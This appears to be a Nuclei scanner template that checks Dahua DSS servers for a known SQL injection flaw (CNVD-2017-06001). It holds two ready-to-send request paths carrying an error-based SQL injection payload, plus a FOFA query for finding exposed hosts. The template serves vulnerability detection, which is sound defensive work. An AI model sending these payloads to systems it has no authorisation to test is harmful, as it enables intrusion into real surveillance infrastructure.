id: CNVD-2017-06001

info:
  name: Dahua DSS - SQL Injection
  severity: high
  author: napgh0st,ritikchaddha
  reference:
    - https://www.cnvd.org.cn/flaw/show/CNVD-2017-06001
  metadata:
    max-request: 1
    verified: true
    fofa-query: app="dahua-DSS"
  tags: cnvd,cnvd2017,sqli,dahua

variables:
  num: "999999999"

http:
  - method: GET
    path:
      - "{{BaseURL}}/portal/attachment_clearTempFile.action?bean.RecId=1') AND EXTRACTVALUE(534543,CONCAT(0x5c,md5({{num}}),0x5c)) AND ('n72Yk'='n72Yk&bean.TabName=1"
      - "{{BaseURL}}/portal/attachment_getAttList.action?bean.RecId=1') AND EXTRACTVALUE(534543,CONCAT(0x5c,md5({{num}}),0x5c)) AND ('n72Yk'='n72Yk&bean.TabName=1"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "XPATH syntax error:"
          - "c8c605999f3d8352d7bb792cf3fdb25"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f369f94051bc8ede985360f3de46c645769896645c53b702a5900b5d7ec68dc3022100db0215796305ea641958244a283b9f55498c217c5151e9f5e96da70c5c7144d1:922c64590222798bb761d5b6d8e72950
